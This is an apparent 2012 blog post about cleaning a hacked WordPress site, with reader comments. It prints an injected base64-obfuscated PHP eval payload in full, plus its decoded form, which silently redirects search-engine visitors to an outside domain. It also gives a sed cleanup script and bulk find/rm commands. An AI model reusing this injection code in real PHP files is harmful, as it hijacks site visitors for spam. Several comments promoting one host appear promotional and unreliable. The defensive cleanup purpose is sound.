Articles
WordPress hacked – Redirect to gigop.americanunfinished.com
Even if I have changed my servers I have been hacked several times. I could not find out how it hacks into my sever and inserts its php code into all php files in my server. I checked my file permissions and all nothing seemed to be vulnerable. A non-techie could not identify the virus attack since it does not affect the normal loading of the website. But when you visit the website as google bot it will redirect the website to gigop.americanunfinished.com. If the google webmaster tool is enabled to your website you receive notification from google that your website has been removed from indexing once your website is hacked. Also if you find the following php code in any one of the php files on your server you can confirm attack.
<?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZ2lnb3AuYW1lcmljYW51bmZpbmlzaGVkLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9")); ?> |
When you decode the above php code you will get the following one
<?php echo error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (!stristr($uag,"MSIE 7.0")){ if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") or !stristr($referer,"inurl")){ header("Location: http://gigop.americanunfinished.com/"); exit(); } } } } } ?> |
Since I did not have the back up for all my files I sought help from friend who is working as a sysadmin. He wrote the following shell script to clean the code from all files.
You can follow the below steps to remove the files.
Step 1: Copy the below code and create “clean.sh”
#!/bin/sh src=$1.hack dst=$1 mv $dst $src sed -e 's,eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZ2lnb3AuYW1lcmljYW51bmZpbmlzaGVkLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));,,g' $src > $dst |
Step 2: Upload “clean.sh” to root folder and give write permission
Step 3: Run the following command
find . -name '*.php' -exec ./clean.sh \{\} \; |
Which will remove the code from all php files and keep the old as php.hack extension.
For example, index.php will be pure and index.php.hack file will be the old file after running the above script.
OR you can run the command only for a single file to make sure that the shell script is working properly
./clean.sh index.php |
Step 4: Run the following command to remove all .php.hack files if everything is fine.
find . -name '*.hack' -exec rm -f \{\} \; |
Tagged file corrupted, search bot problem, wordpress, wordpress hacked
Related Posts
27 Comments
Leave a reply
JasonApr 3, 2012 at 2:54 pm
Thanks so much for posting this. I had the same hack and used your help to fix it. Any idea how they got in?
adminApr 3, 2012 at 4:36 pmAuthor
No Idea man!! I have made all my files write protected after that, it might be some wordpress old version security issue.
ThomasApr 6, 2012 at 6:57 pm
When I run the code i get this message:
find: ./clean.sh: No such file or directory
adminApr 6, 2012 at 7:00 pmAuthor
Did you upload the file ?
ThomasApr 6, 2012 at 7:08 pm
Yes, I uploaded the file, then I did
chmod 777 clean.sh
Then I ran the command you provided in the Root of the server’s SSH.
adminApr 6, 2012 at 7:11 pmAuthor
Are you running the commas from the same location where file reside ?? Double check the path
adminApr 6, 2012 at 7:14 pmAuthor
You have to specify the file name you want to clean after ./clean.sh index.php If you are trying only for a specific file
ThomasApr 6, 2012 at 7:18 pm
I can show you what I have
http://gyazo.com/b4abf2c781697f4e523d3c6b3536ec2d
adminApr 6, 2012 at 7:26 pmAuthor
Could you create a sample php file and try ./clean.sh index.php this command alone
adminApr 6, 2012 at 7:27 pmAuthor
Or copy the file to public_html folder and try it from there
CynthiaApr 9, 2012 at 2:21 am
This has been happening to me as well. I’m just deleted wordpress and resinatalling it. The databases are fine, it’s just the php files. I’ve been running the Bullet Proof Security plugin and changing the permissions of files as it advises (plus all the index php files under the theme directories), and also running Exploit Scanner plugin which identifies all the eval code that’s in there.
I hope that the permissions changes will secure my blogs enough so that they don’t get in again. No idea how they are getting in. It’s totally annoying!
IraApr 19, 2012 at 6:51 pm
I would suggest that you sign up for an account with theshosting.com. They provide free malware removal services on anybody hosted on there servers. My site was hacked at blue host and they were able to transfer it from blue host and also remove the malware injection for free!
They were even able to tell me exactly where the hack originated from as well. They said it came from an outdated timthumb.php file which they were able to update for me.
They also did a scan of my account and told me all the security vulnerabilities of my account.
I honestly suggest switching over to them if your website is hacked. They can transfer and remove the hack from your site. Best of all they do this for free.
CynthiaApr 20, 2012 at 7:34 pm
thanks ira, I will look at them, do you host there?
IraApr 20, 2012 at 7:43 pm
Yup, I have all my wordpress sites with them now. Bluehost was awful. I literally got hacked like 3 times and they did nothing to help.
ryan64Apr 24, 2012 at 7:52 pm
I guess im bit of a newb on this, but can you walk me through how to do step 3. run the comand? where do I put the code?
adminApr 24, 2012 at 11:19 pmAuthor
You need to put the file on the web root folder to check all infected files and run the following command from that folder
find . -name ‘*.php’ -exec ./clean.sh \{\} \;
alexJul 3, 2012 at 6:26 am
some body can explain me where put the line commands ?
thank
ScottJul 4, 2012 at 6:25 pm
Hey, as per Ira’s suggestion, I switched hosts as well to theshosting.com. I am not very technical so this command stuff isn’t for me. I just wanted to come back with a review.
After I signed up with them, I requested a transfer from them. They were able to transfer all the content from my previous host. From there they were able to completely remove the malware on my site. Before this, my site was showing the google attack page for 1 month and I was not able to find anybody that could help with this. Now it is completely fine and I didn’t need to do anything. Not only were they able to clean the entire site, they also told me exactly where the intrusion occurred. In my case, they said I had a php shell embedded in a file called 404.php that allowed the intruder to continue to gain access. They were also able to remove this for me as well.
I contacted them again to find out if they offer this to only new clients or if this is a service they continually provide. It turns out that they assist with this anytime it occurs on there servers. This is the guarantee they provided me, “If your account is ever compromised, many times we will notice this even before you will as we are always monitoring the logs for suspicious uploads. If at any time, you believe your account was compromised please contact us as soon as possible so that we may find out what exactly was modified and take steps to secure your account. We will assist with this at any time.”
They are an awesome host! I highly suggest that you switch over to them especially if your site is infected with malware as they will take care of all of that for you!!
adminJul 4, 2012 at 9:07 pmAuthor
Thank you Scot. My 404.php was not cleared now its fine
Severe Attacks on Wordpress websites - ertyuiop.itsaolJul 27, 2012 at 11:30 am
[...] can refer my previous post regarding the wordpress hacking here to resolve the issue and for more [...]
JTPratt MediaAug 15, 2012 at 9:03 pm
So you removed the hacked code, but did you find the source of the break-in? If not it could happen again and again. That’s the most common complaint to a hacked WP website “it keeps happening”.
We wrote about what to do the other day on our blog:
jtprattmedia.com/my-wordpress-website-is-still-getting-hacked/
NathalySep 13, 2012 at 3:54 am
If you want to stop this attacks, after remove the hack code of all your files, you should change all your FTP accounts passwords. That works for me!
NidhinOct 11, 2012 at 10:14 am
Thanks a lot, it saved my ass.
How to remove malware from Wordpress website? | SkillsYardOct 26, 2012 at 11:31 am
[...] you get the eval base64_decode injection in all PHP files on your hosting, you can use clean.sh script to remove the injected code from all PHP files available on http://tech.sarathdr.com [...]
IosifDec 9, 2012 at 5:54 am
It is extremely important to find out how they got in. You can remove the code but eventually it will be back, if you don’t close the door.
How to remove malware from WordPress website? - MadGuyyyFeb 3, 2013 at 12:51 pm
[...] you get the eval base64_decode injection in all PHP files on your hosting, you can use clean.sh script to remove the injected code from all PHP files available on http://tech.sarathdr.com [...]
How to remove malware from WordPress website? | ScrewDeskScrewDeskMar 31, 2013 at 8:28 pm
[...] you get the eval base64_decode injection in all PHP files on your hosting, you can use clean.sh script to remove the injected code from all PHP files available on http://tech.sarathdr.com [...]